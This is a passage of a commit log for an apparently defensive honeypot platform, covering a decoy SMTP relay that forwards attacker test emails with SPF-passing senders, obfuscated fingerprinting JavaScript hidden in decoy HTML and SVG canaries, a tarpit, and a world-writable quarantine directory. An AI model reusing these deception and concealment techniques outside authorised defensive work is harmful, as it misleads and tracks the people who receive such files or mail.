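    client.login(user, password)
```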
633594b110 fix(smtp_relay): use correct async-for bus subscription in probe listener
bus.subscribe() is sync and returns an async iterator, not a coroutine.
Awaiting it caused an immediate crash at startup; bus.next_message() does
not exist either. Rewrote _run_smtp_probe_listener to use the standard
pattern: sub = bus.subscribe(...) / async with sub / async for event in sub.
2026-04-30 12:35:45 -04:00
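The subscription pattern named above, shown against a stand-in bus. `FakeBus` and `FakeSubscription` are invented for the example; the real bus API is only known here to the extent that subscribe() is sync and its result supports `async with` and `async for`.

```python
import asyncio


class FakeSubscription:
    def __init__(self, events):
        self._events = list(events)

    async def __aenter__(self):
        return self

    async def __aexit__(self, *exc):
        return False

    def __aiter__(self):
        return self

    async def __anext__(self):
        if not self._events:
            raise StopAsyncIteration
        return self._events.pop(0)


class FakeBus:
    def __init__(self, events):
        self._events = events

    def subscribe(self, topic):  # plain def: returns the subscription directly
        return FakeSubscription(self._events)


async def run_listener(bus, topic, handle):
    sub = bus.subscribe(topic)  # no await: subscribe() is not a coroutine
    async with sub:
        async for event in sub:
            await handle(event)
```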
761c23a07c fix(smtp_relay): emit service=smtp_relay in syslog so ingester can gate probe publish
SERVICE_NAME was hardcoded to 'smtp' in server.py; the ingester's probe
publish guard checked service == 'smtp_relay' and never matched.

Read SMTP_SERVICE_NAME from env (default 'smtp'); smtp_relay compose
fragment sets it to 'smtp_relay' so the two services are distinguishable.
2026-04-30 12:31:29 -04:00
f0d47c5195 fix(smtp): chmod quarantine dir before dropping to logrelay
The bind-mounted quarantine dir is owned by the host decnet user; the
logrelay process had no write access because the Dockerfile USER directive
took effect before the entrypoint could fix permissions.

Run entrypoint as root, chmod 0777 the quarantine dir, then exec the
server under logrelay via su.
2026-04-30 12:25:37 -04:00
8ae7b9636e feat(smtp_relay): move probe forwarding to realism worker via bus
Attacker probe emails are now forwarded by the master (realism worker)
rather than inside the MACVLAN container, which has no internet gateway.

- New smtp.probe.pending bus topic: ingester publishes when smtp_relay
  message_stored fires; worker subscribes and does the actual delivery
- decnet/orchestrator/drivers/smtp_relay.py: pure-sync forward_probe()
  reads the .eml from disk and sends via smtplib on a thread executor
- worker.py: _run_smtp_probe_listener + _handle_probe_pending subtask;
  limit enforced via count_probe_relays() (DB-backed, restart-safe)
- bounties.py: count_probe_relays() query on probe_relay bounty type
- fleet.py: get_fleet_decky_by_name() to pull service config from DB
- services/smtp_relay.py: upstream_* and probe_limit fields defined in
  config_schema but NOT injected into container env (credentials stay
  out of docker env vars)
- ingester.py: stripped of smtplib; publishes probe.pending and exits
- tests: assert upstream keys absent from container environment
2026-04-30 12:10:58 -04:00
4c0a1309f0 fix(smtp_relay): log upstream error reason in probe_forwarded event
forwarded=0 was silent — now fwd_error carries the exception string so
you can see exactly why the upstream refused (auth failure, connection
refused, timeout, etc.).
2026-04-30 11:57:07 -04:00
c78ba6f698 fix(deploy): pre-remove container by name before force-recreate
Docker Compose tracks the previous container by internal ID. When that
container was already removed or renamed, --force-recreate fails with
"No such container". Remove by name first so Compose always starts clean.
2026-04-30 11:54:00 -04:00
fdf38a9d8c feat(smtp_relay): add upstream_sender to fix SPF on probe forwarding
Override the envelope MAIL FROM with a domain we own when talking to the
upstream relay. SPF passes at the recipient; the attacker's From: header
inside the message body is untouched so they see their own address in their
inbox and believe the relay is real.
2026-04-30 11:47:18 -04:00
24cdef9246 feat(smtp_relay): ingest probe_forwarded as probe_relay bounty
Adds probe_forwarded to meaningful event kinds and stores it in the
bounty table as bounty_type=probe_relay with forwarded=true/false, so
the dashboard shows whether the upstream actually accepted the test email.
2026-04-30 11:32:14 -04:00
9a4fe2677b feat(smtp_relay): forward probe emails upstream so attackers verify relay works
First SMTP_PROBE_LIMIT messages per source IP are forwarded via a real
upstream relay (SMTP_UPSTREAM_HOST/PORT/USER/PASS) so the attacker's
test email actually lands in their inbox. All subsequent messages from
the same IP get 250 Ok but only hit the quarantine — campaign content
captured, nothing delivered.
2026-04-30 11:21:04 -04:00
4b7cb42ab1 fix(profiler): extract commands when MSGID=command, not just MSGID=NIL
The Dockerfile PROMPT_COMMAND logger uses --msgid command, so the MSGID
field arrives as 'command' not '-'. The CMD rewrite block was guarded by
event_type == '-' so it never fired, leaving fields['command'] unpopulated
and cmd_text=None for every SSH session command.

Broaden the guard to also match event_type == 'command' with no existing
'command' field, which covers both the intended (MSGID=NIL) and actual
(MSGID=command) wire formats.
2026-04-30 10:57:29 -04:00
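A sketch of the broadened guard as a standalone predicate. `should_rewrite_command` is a hypothetical name, and the real block may check more conditions on the MSGID=NIL path than shown here.

```python
def should_rewrite_command(event_type: str, fields: dict) -> bool:
    """Decide whether the CMD rewrite should populate fields['command']."""
    if event_type == "-":  # intended wire format: MSGID=NIL
        return True
    # Actual wire format: MSGID=command, but only when nothing has set the field yet.
    return event_type == "command" and "command" not in fields
```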
bbb1762250 fix(export): one attacker per line in exported JSON 2026-04-30 10:45:03 -04:00
2ddba04f79 feat(attackers): add JSON export endpoint and download button 2026-04-30 10:43:46 -04:00
f0756dcdec fix(ui): use overflow: clip on dash panels so inner scrollbars aren't masked 2026-04-30 00:34:40 -04:00
18393f1e1c fix(ui): bound dashboard height so panels don't overflow viewport
.content-viewport is overflow-y: auto so flex:1 on dash-grid grew to
content height. Fix: dashboard uses height:100% instead of min-height,
and :has(>.dashboard) disables content-viewport scroll only on that
route — all other pages keep their normal scroll.
2026-04-30 00:32:16 -04:00
9ed0094045 fix(ui): reset live feed scroll to top on log update
Sticky thead was floating mid-content when the container auto-scrolled
as new log entries arrived. Pinning scrollTop to 0 on each logs update
keeps the thead at position 0 where it belongs.
2026-04-30 00:30:46 -04:00
fca0953439 fix(ui): dashboard grid fills available viewport height
Use flex: 1 on dash-grid instead of height: 480px so the panels
consume all remaining space below the stat cards; dash-side uses
height: 100% to fill its grid cell
2026-04-30 00:27:47 -04:00
b364c41736 fix(ui): dashboard panel heights + missing icon
- Use height: 480px on .dash-grid so both columns are the same height;
  side panels split that height via flex instead of their own max-height
- Add LayoutDashboard icon to the DASHBOARD page header
2026-04-30 00:24:27 -04:00
fbc9877ef2 fix(ui): follow-up polish — icons, dashboard bar, filter redesign, bounty/creds sort
- Dashboard: fix invisible bar at bottom of LIVE FEED by constraining
  max-height on the section instead of the inner container; same fix
  for side panels
- Page icons: add violet-accent icon beside h1 on all 9 missing pages
  (CanaryTokens, RealismConfig, SyntheticFiles, PersonaGeneration,
  Attackers, Webhooks, LiveLogs, Topologies, DeckyFleet)
- Attackers filter chips: replace ad-hoc chip buttons with seg-group
  tabs (ALL / ACTIVE N / PASSIVE N / INACTIVE N) matching Credential
  Vault style; country chips use same seg-group treatment
- Credential Vault: add sortable headers to REUSE tab (LAST SEEN,
  PRINCIPAL, KIND, TARGETS, ATTEMPTS); reuses same SortTh pattern
- Bounty: remove CREDENTIALS and PAYLOADS tabs; keep ALL, ARTIFACTS,
  FINGERPRINTS; add EMAIL (artifact subtype, filtered client-side)
2026-04-30 00:20:25 -04:00
9adee07d21 feat(ui): frontend polish sweep — 8 UX fixes
- DeckyFleet: card click opens inspect side-drawer instead of
  auto-filtering (localSearch filter behavior removed)
- Dashboard: LIVE FEED / DECKIES UNDER SIEGE / TOP ATTACKERS panels
  now have fixed max-height with overflow scroll instead of growing
- parseEventBody: defensive RFC 5424 header strip so raw syslog lines
  from the collector render as k=v pills instead of raw text
- Attackers: search placeholder updated; activity (Active/Passive/
  Inactive) and country chip filters added on top of existing IP search
- Credentials + Bounty: sortable column headers (click to asc/desc/clear)
- SwarmHosts + RemoteUpdates: icon extracted from <h1> into flex div
  with violet-accent class, matching site-wide Identities pattern
- Swarm.css: fix --panel-border undefined variable → --border so the
  title border-bottom line is visible on SwarmHosts and RemoteUpdates
2026-04-29 23:56:38 -04:00
a322d88b3c fix(tarpit): resolve topology container name in watcher before PID lookup 2026-04-29 21:14:21 -04:00
917f7e8e54 feat(tarpit): MazeNET topology-scoped tarpit — Inspector controls + topology API 2026-04-29 21:10:02 -04:00
f84c66cf9b feat(ui): tarpit controls on DeckyCard — three-dot dropdown + enable/disable 2026-04-29 20:56:51 -04:00
07b32e2abe fix(tests): patch add_service/remove_service at the router import, not the module
Monkeypatching services_live.add_service had no effect because api_services
already held a local reference to the name. Patch api_services.add_service
and update fake stubs to accept the config kwarg added to the real signature.
2026-04-29 18:50:21 -04:00
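Sketch for 07b32e2abe: why patching the source module has no effect once the router has done a from-import. The two modules are faked in-process with types.ModuleType and exec purely so the demo fits in one file; the handle function is a hypothetical stand-in for the router endpoint.

```python
import sys
import types

# Stand-in for the module that defines the real function.
services_live = types.ModuleType("services_live")
exec(
    "def add_service(name, config=None):\n"
    "    return 'real'\n",
    services_live.__dict__,
)
sys.modules["services_live"] = services_live

# Stand-in for the router module: it binds its own name at import time.
api_services = types.ModuleType("api_services")
exec(
    "from services_live import add_service\n"
    "def handle(name):\n"
    "    return add_service(name, config={})\n",
    api_services.__dict__,
)


def fake_add_service(name, config=None):
    # Accepts the config kwarg, like the updated stubs in the commit.
    return "fake"


# Patching the defining module leaves the router's reference untouched.
services_live.add_service = fake_add_service
patched_at_source = api_services.handle("ssh")

# Patching the name where it is looked up takes effect.
api_services.add_service = fake_add_service
patched_at_import_site = api_services.handle("ssh")
```

With pytest the second form corresponds to monkeypatch.setattr(api_services, "add_service", fake_add_service).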
5f4005c47a feat(tarpit): port-selective tc netem tarpit mode with live log events
- GET/POST/DELETE /api/v1/deckies/{name}/tarpit (admin write, viewer GET)
- get_container_veth() + get_container_pid() in network.py via iflink/ip-link
- TarpitRule SQLModel table + TarpitMixin repo (upsert/get/delete/list)
- Background tarpit_watcher_worker: polls /proc/{pid}/net/tcp every 15s,
  emits tarpit_enter/tarpit_exit log events (edge-triggered, with duration)
- tarpit_enabled/tarpit_disabled logs on operator POST/DELETE actions
2026-04-29 18:49:42 -04:00
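Sketch for 5f4005c47a: the edge-triggered part of the watcher, assuming the poll has already been parsed into a set of connection tuples. diff_connections and the event tuple shape are hypothetical; parsing /proc/{pid}/net/tcp is left out.

```python
def diff_connections(tracked, current, now):
    """Emit enter/exit events only when a connection appears or vanishes.

    tracked: dict mapping connection -> time it was first seen (mutated).
    current: set of connections observed in this poll.
    now:     timestamp of this poll, in seconds.
    """
    events = []
    # New connections: remember when they entered the tarpit.
    for conn in sorted(current - set(tracked)):
        tracked[conn] = now
        events.append(("tarpit_enter", conn, None))
    # Vanished connections: report how long they were held.
    for conn in sorted(set(tracked) - current):
        entered_at = tracked.pop(conn)
        events.append(("tarpit_exit", conn, now - entered_at))
    return events
```

A connection that is present in two consecutive polls produces no event, which is what keeps the log quiet between the enter and exit edges.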
2fc5f1bdc5 feat(canary): auto-deregister fingerprint slug after first valid beacon
Once a fingerprint canary's HTTP beacon passes all 4 validation layers
and the trigger row lands, the token is immediately set to state=revoked
and canary.<id>.revoked is published on the bus. The slug lookup is
tightened to only return planted tokens, so subsequent requests to the
same URL silently return the transparent GIF without persisting anything
(stealth posture preserved). Plain http/dns canaries with no
fingerprint_nonce are not affected.

Changes:
- sqlmodel_repo/canary.py: add state == "planted" filter to
  get_canary_token_by_slug so revoked slugs resolve to None
- worker.py: after record_canary_trigger, if parsed_fp survived all
  layers and token has a fingerprint_nonce, call
  update_canary_token_state("revoked") + publish CANARY_REVOKED; errors
  are best-effort (trigger row already landed)
- test_worker_http.py: assert state=revoked in test_fp_valid_nonce_persists;
  new test_fp_deregisters_slug_after_valid_hit (second hit records nothing);
  new test_plain_http_canary_not_deregistered (env_file stays planted)
2026-04-29 17:49:31 -04:00
b26dd8f529 feat(canary): API-trashing defense — 4-layer fingerprint validation
Adds per-mint nonce gating, structural shape validation, mint UUID
consistency checks, and a per-(token, IP) rate limiter to the canary
worker so attackers who extract a canary from a decky filesystem cannot
poison fingerprint forensics by replaying or forging ?d= submissions.

Changes:

base.py
  fingerprint_nonce: Optional[str] added to CanaryArtifact so generators
  can surface the nonce to the cultivator without coupling the generator
  directly to DB code.

obfuscator.py
  nonce_for(callback_token, mint_uuid): HMAC-SHA256 keyed on
  DECNET_CANARY_FINGERPRINT_SECRET, truncated to 16 hex chars.
  FingerprintSecretMissing raised at mint time if env var is unset.
  render_fingerprint_js() now accepts nonce= and substitutes MINT_NONCE.

fingerprint_payload.js
  New MINT_NONCE placeholder. Appended as &k= on all beacon URLs (bare-open,
  single-shot, chunked). Using &k= avoids colliding with &n= (chunk total).

fingerprint_html.py / fingerprint_svg.py
  Derive nonce via nonce_for() and pass to render_fingerprint_js(). Set
  artifact.fingerprint_nonce so the cultivator can persist it.

cultivator.py
  Passes fingerprint_nonce into create_canary_token() when present on the
  artifact; NULL for all non-fingerprint generators.

canary.py (model)
  fingerprint_nonce: Optional[str] = Field(default=None, max_length=16)
  added to CanaryToken. None for non-fingerprint tokens.

worker.py
  _extract_fingerprint now returns (meta_dict, parsed_fp) tuple.
  _record_hit accepts parsed_fp + raw_nonce and runs 4 layers after
  token lookup: nonce match, shape check, mint UUID consistency, rate limit.
  Each failure sets _fp_invalid_* flag and drops structured _fp.
  Trigger row always lands regardless.

tests/canary/conftest.py
  Session-scoped autouse fixture sets DECNET_CANARY_FINGERPRINT_SECRET so
  fingerprint generator and worker tests work offline.

tests
  5 new worker HTTP tests and 2 new generator tests covering each
  validation layer.
2026-04-29 17:41:04 -04:00
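Sketch for b26dd8f529: a nonce derivation along the lines described for obfuscator.py. The HMAC-SHA256 key, the 16-hex-char truncation and the exception name come from the commit message; the message layout (token and mint UUID joined by ':') and the nonce_matches helper are assumptions.

```python
import hashlib
import hmac
import os


class FingerprintSecretMissing(RuntimeError):
    """Raised at mint time when the HMAC secret is not configured."""


def nonce_for(callback_token, mint_uuid):
    secret = os.environ.get("DECNET_CANARY_FINGERPRINT_SECRET")
    if not secret:
        raise FingerprintSecretMissing(
            "DECNET_CANARY_FINGERPRINT_SECRET is unset"
        )
    # Assumed message layout; the real concatenation is not documented here.
    message = f"{callback_token}:{mint_uuid}".encode("utf-8")
    digest = hmac.new(secret.encode("utf-8"), message, hashlib.sha256)
    return digest.hexdigest()[:16]  # 16 hex chars, fits max_length=16


def nonce_matches(callback_token, mint_uuid, presented):
    # Hypothetical layer-1 check: constant-time compare against &k=.
    expected = nonce_for(callback_token, mint_uuid).encode("ascii")
    return hmac.compare_digest(expected, presented.encode("utf-8"))
```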
f86dc79990 feat(canary): ship Node helper with wheel + install-toolchain CLI
The fingerprint canaries' obfuscator shells out to a Node helper that
require()s javascript-obfuscator. Without this commit, a fresh
pip install decnet would land the .py modules but not the .js helper /
package.json, and there'd be no documented way to provision the Node side.

* pyproject.toml - extend tool.setuptools.package-data to ship
  canary/_obfuscate_helper.js, canary/fingerprint_payload.js, and
  canary/package.json with the wheel.
* decnet/cli/canary.py - new "decnet canary-install-toolchain"
  subcommand. Resolves decnet.canary.__file__'s dir, runs
  npm install --omit=dev there, exits non-zero with a clear message
  if npm is missing or install fails. Idempotent - safe to call
  on every API service start.
* deploy/decnet-api.service.j2 - non-fatal ExecStartPre that calls
  the new subcommand. Leading '-' so a missing Node toolchain only
  degrades fingerprint canaries (loud at mint time) without keeping
  the API from booting.
* tests/canary/test_cli.py - registration smoke test, missing-npm
  exit path, and a mocked-subprocess test asserting the right argv
  and cwd land on npm.

Realism cultivator already has a broad except Exception around
cultivate() in scheduler.py:195-211, so a missing toolchain on a
host running the realism tick degrades to an inert noise file with
no extra plumbing.
2026-04-29 16:53:27 -04:00
907ade9142 feat(realism): wire fingerprint_html/svg through taxonomy + UI
The two new fingerprint canary generators existed at the API level
since f64e78f but weren't visible to the realism engine or the
operator-facing dashboard. Threads them through every place that
enumerates canary content classes.

Backend:
* realism/taxonomy.py - two new ContentClass members
  (CANARY_FINGERPRINT_HTML, CANARY_FINGERPRINT_SVG); enum is
  wire-visible (synthetic_files.content_class column + bus discrim)
  so we add at the bottom, never reorder.
* canary/cultivator.py - class-to-generator dispatch, kind mapping
  (both http), and default placement paths
  (~/Documents/asset_directory.html and network_topology.svg).
* realism/naming.py + bodies.py - _name_canary / _body_canary entries.
* realism/planner.py - added to _DEFAULT_CANARY_CLASS_WEIGHTS and
  the _CANARY_CLASSES classification set.

Frontend:
* decnet_web/src/realism/labels.ts - display labels.
* decnet_web/src/components/RealismConfig/RealismConfig.tsx - default
  canary weight rows so operators see them in the realism config UI.
* decnet_web/src/components/SyntheticFiles/SyntheticFiles.tsx - added
  to the CONTENT_CLASSES allow-list so filter dropdowns show them.

Also: re-applied the nosec B404/B603 markers on canary/obfuscator.py;
the first commit's pre-commit autoformatter stripped them.

Tests: extended tests/realism/test_taxonomy.py's stability assertion
to include the two new values. Full canary + realism suites pass
(362 / 2 skipped).
2026-04-29 16:44:03 -04:00
de6d5cd1a8 fix(canary): include fingerprint_* in KNOWN_GENERATORS stability test 2026-04-29 16:26:09 -04:00
dd807bc55e feat(canary): worker decodes ?d=/?o=/?s=&i=&n=&d= fingerprint params
The fingerprint payload beacons fingerprint data as base64url JSON in
GET query params: ?o=1 for the bare-open beacon, ?d=<blob> for a
single-shot dump, or ?s/i/n/d=<chunk> for chunked dumps. Until now
those params were buried inside request_path; consumers had to parse
the URL themselves.

Worker now extracts them in _extract_fingerprint and merges into
raw_headers under reserved _fp* keys:

* _fp_open       — bare-open marker
* _fp            — decoded fingerprint dict (single-shot path)
* _fp_sid/idx/total/chunk — chunked metadata + raw base64 (reassembly
  is a downstream concern, not the worker's job)
* _fp_decode_error / _fp_oversize — failure markers for trash dumps

Per-chunk size capped at 8KB so an attacker spamming /c/<known_slug>
can't inflate trigger rows indefinitely. Decode failures degrade
gracefully — the trigger row still records the hit, just with a
_fp_decode_error flag instead of structured fingerprint data.

Tests cover the single-shot decode, bare-open flag, chunked metadata,
malformed input, and oversize drop paths.
2026-04-29 16:25:17 -04:00
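Sketch for dd807bc55e: the single-shot ?d= path, assuming the 8KB cap is applied to the encoded parameter and that senders may strip base64 padding. decode_fingerprint_param is a hypothetical name; the reserved _fp* keys are the ones listed in the commit.

```python
import base64
import json

MAX_CHUNK_BYTES = 8 * 1024  # per-chunk cap from the commit message


def decode_fingerprint_param(blob):
    """Decode a base64url JSON blob into reserved _fp* keys."""
    if len(blob) > MAX_CHUNK_BYTES:
        return {"_fp_oversize": True}
    try:
        # Restore any padding the sender stripped before decoding.
        padded = blob + "=" * (-len(blob) % 4)
        parsed = json.loads(base64.urlsafe_b64decode(padded))
    except ValueError:
        # binascii.Error, JSONDecodeError and UnicodeDecodeError are all
        # ValueError subclasses, so trash input ends up here.
        return {"_fp_decode_error": True}
    if not isinstance(parsed, dict):
        return {"_fp_decode_error": True}
    return {"_fp": parsed}
```

In every failure path the caller still has something to merge into raw_headers, so the trigger row can be recorded regardless.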
f64e78f78c feat(canary): fingerprint_html + fingerprint_svg generators
Two new synthesised-artifact generators that bake the obfuscated
fingerprint payload into plausible-looking decoy files:

* fingerprint_html — a mundane "Internal Asset Directory" page with a
  small table of fake hosts; the obfuscated payload is inlined at the
  bottom of <body>. Visible content (row pool slice, sync timestamp)
  also varies per mint via SHA-256-derived stable ints, so two
  extracted canaries don't diff to zero even on the rendered surface.
* fingerprint_svg — standalone SVG with an embedded <script> CDATA
  block. SVG <script> only fires for top-level loads / <object> /
  <iframe>; <img>-referenced renders are safely inert.

Both derive the mint UUID via uuid.uuid5 from the callback token, so
re-mints are byte-identical (preserving the generator determinism
contract) AND the same token produces the same mint UUID across HTML
and SVG variants — the worker can correlate beacons across artifact
shapes.

Wired into the factory + KNOWN_GENERATORS, default placement paths
under ~/Documents/asset_directory.html and ~/Documents/network_topology.svg
for both linux and windows personas. Tests cover determinism, per-token
divergence, structural validity (DOCTYPE/SVG headers), and that the
beacon URL stays inside the obfuscated string array (not in plaintext).
The two new entries skip in test_generators.py when Node toolchain is
absent so bare CI checkouts still pass.
2026-04-29 16:22:18 -04:00
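Sketch for f64e78f78c: deriving the mint UUID with uuid.uuid5 so re-mints stay byte-identical. The namespace value and the mint_uuid_for name are hypothetical; the commit only states that uuid5 is keyed on the callback token.

```python
import uuid

# Hypothetical namespace; the real one is not given in the commit.
MINT_NAMESPACE = uuid.uuid5(uuid.NAMESPACE_URL, "https://example.invalid/mint")


def mint_uuid_for(callback_token):
    """Same token in, same UUID out, for both HTML and SVG variants."""
    return uuid.uuid5(MINT_NAMESPACE, callback_token)
```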
12cd7ad9cb feat(canary): per-mint JS obfuscator wrapper + fingerprint payload
Adds the load-bearing primitives for obfuscated browser-fingerprinting
canaries. Step 3 (HTML/SVG generators) and step 4 (worker-side
fingerprint ingestion) build on top of these.

* decnet/canary/obfuscator.py - javascript-obfuscator wrapper. Seed
  and polymorphic config bits both derive from the callback token, so
  output is byte-identical for the same mint (preserving the generator
  determinism contract from base.py) and structurally distinct across
  mints.
* decnet/canary/fingerprint_payload.js - port of canary-self-test.html
  with the rendering UI stripped. Two placeholders (BEACON_URL,
  MINT_UUID) substituted before obfuscation. MVP beacon strategy:
  bare-open GET pixel first, then base64url-encoded fingerprint as
  query params on subsequent GETs (chunked above ~6KB) so the existing
  worker records hits before step-4 lands.
* decnet/canary/_obfuscate_helper.js - Node subprocess helper that
  reads code+options JSON from stdin and writes obfuscated JS to
  stdout. Vendored javascript-obfuscator under decnet/canary/.
* tests/canary/test_obfuscator.py - determinism, per-mint divergence,
  template substitution, Node syntax check, error path.
2026-04-29 16:16:37 -04:00
eefab020d4 fix(swarm): propagate service mutations to worker agent via shard re-dispatch
Add/remove/update_config on a fleet decky living on a swarm worker — and on
an agent-pinned topology — used to run the master's local docker-compose only,
which has no containers for the remote decky. The mutation persisted on master
and silently no-op'd on the worker.

- Fleet swarm: lookup DeckyShard.host_uuid; if found, rebuild a single-host
  shard from master state and call dispatch_decnet_config — same proven path
  as POST /swarm/deploy. Skip local _compose (no containers to touch).
- Topology agent-pinned: call decnet.engine.deployer.resync_agent_topology
  (existing helper) to push the latest hydrated blob to the worker.
- Local-only deckies: behaviour unchanged.
- Tests: 5 new in tests/engine/test_services_live_swarm.py covering all
  three mutations on a swarm fleet decky (no local _compose, dispatch fires
  with the right host's deckies), plus apply=False save-only path (no
  dispatch), plus regression that local-only fleet add still runs local compose.

Bus signal `decky.{name}.service_config_changed` keeps publishing as an
audit trail; it is not the propagation trigger.
2026-04-29 12:51:16 -04:00
94b06ee862 feat(services): initial config on ADD SERVICE — schema modal in DeckyCard, MazeNET drag, and Inspector
- DeckyServiceAddRequest gains an optional `config: dict` field, validated
  against the service's config_schema before any state mutation (400 on
  bad type, no half-written rows).
- Engine: add_service threads `config` into _add_topology_service /
  _add_fleet_service, persisting validated cfg to decky_config.service_config
  BEFORE compose regen so the first `up -d --build` materialises the env on
  the new container. No follow-up apply needed.
- Frontend: shared AddServiceConfigModal — same wizard accordion shape, used by:
    * DeckyCard's ADD SERVICE picker (Fleet & MazeNET inspectors via shared component)
    * MazeNET Inspector's ADD SERVICE picker
    * MazeNET palette drag-drop onto a deployed decky
  Empty-schema services short-circuit to a one-click add (no modal flash).
  Operator can cancel; errors surface in the modal.
- Tests: add_service config plumbing — persist, drop unknown keys, 400-equivalent
  on bad types, back-compat empty-config.
- Drive-by: fix stale repo-method names in test_services_live.py
  (create_topology_decky → add_topology_decky, get_topology_decky → list+pick helper,
  service.added → service_added topic).
2026-04-29 12:44:47 -04:00
77ceb9d6f3 feat(services): config schemas for the rest of the registry + textarea base64 transport
- Declarative config_schema on RDP, Telnet, MySQL, Redis, SMTP, SMTP_Relay
  matching the keys each service already reads at compose time.
- TODO marker on the 19 services that accept service_cfg but never read it,
  so future contributors know where to plug schemas in.
- Wizard base64-wraps all textarea values at INI emit (DeckyFleet
  buildIni); validate_cfg detects the b64: sentinel and decodes back to
  UTF-8. Plain raw strings still pass through for direct API submitters.
- HTTPS image entrypoint accepts PEM content or path in TLS_CERT/TLS_KEY:
  detects a BEGIN header, writes content to /opt/tls/, and re-exports
  the on-disk path so server.py keeps reading paths.
- Tests cover schema/compose alignment for each new service plus
  textarea base64 round-trip (incl. UTF-8) and HTTPS PEM end-to-end.
2026-04-29 12:23:56 -04:00
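Sketch for 77ceb9d6f3: the b64: sentinel round trip for textarea values. The wrapping side really lives in the wizard's frontend code; both halves are shown in Python here for a self-contained demo, and the use of standard (not URL-safe) base64 is an assumption.

```python
import base64

B64_SENTINEL = "b64:"


def wrap_textarea(value):
    """What the wizard is described as doing at INI emit time."""
    encoded = base64.b64encode(value.encode("utf-8")).decode("ascii")
    return B64_SENTINEL + encoded


def unwrap_textarea(value):
    """Decode sentinel-prefixed values; pass plain strings through."""
    if not value.startswith(B64_SENTINEL):
        return value  # direct API submitters may send raw strings
    return base64.b64decode(value[len(B64_SENTINEL):]).decode("utf-8")
```

Wrapping keeps multi-line values such as PEM blocks on a single INI line without any newline escaping.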
d8fa7cc73d feat(ui): per-service config in the deploy wizard's CONFIGURATION step
Setting a password, banner or TLS material AFTER deployment forces a
container recreate on every change. The deploy wizard now lets the
operator set service config up-front so the initial build has the
right env from the start.

Mechanics:
- Extracted the schema-driven field rendering out of ServiceConfigForm
  into a standalone ServiceConfigFields component (no API/buttons,
  just inputs + onChange).  ServiceConfigForm now delegates to it.
- Wizard step 2 (CONFIGURATION) renders one accordion block per
  selected service; clicking a service reveals its schema-driven
  inputs and a 'N set' badge tracks how many overrides are populated.
  Removing a service (back to step 1) drops its config so the INI
  doesn't carry orphans.
- _buildIni emits one [<prefix>.<svc>] group subsection per service
  with at least one override.  The INI loader's prefix-matcher
  applies it to every ${prefix}-NN decky in the batch, so one block
  covers all clones.
- Multi-line string values (PEM textareas etc.) are escaped as \n
  on the way into INI; downstream consumers re-expand.
2026-04-29 12:08:17 -04:00
97260daf8d fix(ui): make .info-banner usable inside the deploy-wizard modal
PersonaGeneration.css scopes .info-banner under .persona-gen-root,
which doesn't match elements rendered inside the Modal portal —
so the wizard's CONFIGURATION-step banner I just added rendered
as plain text.

Add a page-unscoped .info-banner rule in DeckyFleet.css with the
same visual treatment (faint bg, violet left rule) so any modal
context picks it up.
2026-04-29 12:01:42 -04:00
8d3f5c646a fix(network): accept CAP_NET_ADMIN in lieu of euid==0 for macvlan setup
The systemd unit grants AmbientCapabilities=CAP_NET_ADMIN so the API
service can program host-side macvlan/ipvlan interfaces without
running as root, but setup_host_macvlan/_ipvlan rejected with euid!=0
before even trying — making web-driven 'decnet deploy' impossible
under the privilege model the unit advertises.

Replace _require_root with _require_net_admin, which reads CapEff
from /proc/self/status and accepts the cap (bit 12) as well as
euid==0. No libcap dep — pure /proc parse.
2026-04-29 11:56:40 -04:00
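Sketch for 8d3f5c646a: the CapEff check as a pure function over the text of /proc/self/status. has_net_admin is a hypothetical name; bit 12 is CAP_NET_ADMIN as stated in the commit.

```python
CAP_NET_ADMIN_BIT = 12


def has_net_admin(status_text, euid):
    """Accept either root or an effective CAP_NET_ADMIN capability."""
    if euid == 0:
        return True
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            # CapEff is a hex bitmask of the effective capability set.
            mask = int(line.split(":", 1)[1].strip(), 16)
            return bool(mask & (1 << CAP_NET_ADMIN_BIT))
    return False
```

On Linux the live inputs would be the contents of /proc/self/status and os.geteuid(); keeping them as parameters makes the check testable without privileges.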
5912608f78 fix(ui): wizard CONFIGURATION step + drop bogus --archetype custom preview
The CONFIGURATION step had a stale disabled placeholder textarea
("per-service overrides") from before the schema-driven Inspector
landed. Replaced with a one-line info banner pointing at the Inspector,
which is now where per-service config actually lives.

The DEPLOY step's CLI preview was rendering '--archetype custom' when
pickMode==='services', but no such archetype is registered — only the
preset archetypes plus 'services' (free-form list). Drop the
--archetype line entirely in the services-mode preview so the rendered
command reflects what the API actually receives.
2026-04-29 11:56:29 -04:00
ba0e7ca476 style(ui): rebuild ServiceConfigForm in inspector terminal vocabulary
Previous CSS lived in DeckyFleet.css only, so when the form rendered
inside MazeNET Inspector the inputs fell back to browser defaults
(white-on-white, oversized labels, mismatched buttons).

New ServiceConfigForm.css ships with the component itself: small
uppercase tracking-1 labels at 0.6rem (matches kvs .k), dark
transparent inputs with violet focus, matrix-green text inside
inputs, custom select chevron, dedicated svc-cfg-btn that visually
mirrors maze-btn.small, password reveal toggle, and a 96px label
column so labels never wrap into the input. Help text drops to
0.58rem dim under the input. Works identically in both surfaces.
2026-04-29 11:50:35 -04:00
e51666ee14 fix(ui): stop ServiceConfigForm from re-fetching schema every render
The schema useEffect depended on currentConfig, which the parent
passes as a fresh `{}` literal on every render — referentially new
each time, so the effect re-ran and the GET /services/.../schema
hammered the server.

Schema fetch now only depends on serviceSlug; form seeding from
currentConfig moved to a separate effect keyed on JSON-stringified
config so a real change reseeds but referential churn doesn't.
2026-04-29 11:48:20 -04:00
bd7f2dfaed feat(ui): schema-driven ServiceConfigForm in Fleet & MazeNET inspectors
ServiceConfigForm.tsx fetches /topologies/services/{slug}/schema and renders
typed inputs (string/password/int/bool/textarea/enum) with reveal toggles for
secrets. SAVE persists via PUT (no restart); APPLY persists + force-recreates
the service container after a confirm dialog (matches the forwards_l3 pattern).

Mounts:
- DeckyFleet DeckyCard: clicking a service tag toggles the form below the
  EXPOSED row, gated on liveServicesEnabled (admin + non-swarm).
- MazeNET Inspector: renders the form above REMOVE SERVICE when a service
  is selected on a non-observed decky.

UI test plan is manual — no jsdom test infra in decnet_web yet.
2026-04-29 11:41:43 -04:00
75b1ce3a31 feat(api): per-service config schema endpoint + PUT/POST update+apply for fleet & topology
- GET /topologies/services/{name}/schema serves the declared ServiceConfigField
  metadata so the Inspector can auto-render forms.
- PUT  /(topologies/{id}/)deckies/{decky}/services/{svc}/config persists the
  validated dict (DB + compose); container untouched (Save).
- POST /(topologies/{id}/)deckies/{decky}/services/{svc}/apply persists then
  force-recreates <decky>-<svc> so the new env takes effect (Apply, destructive).
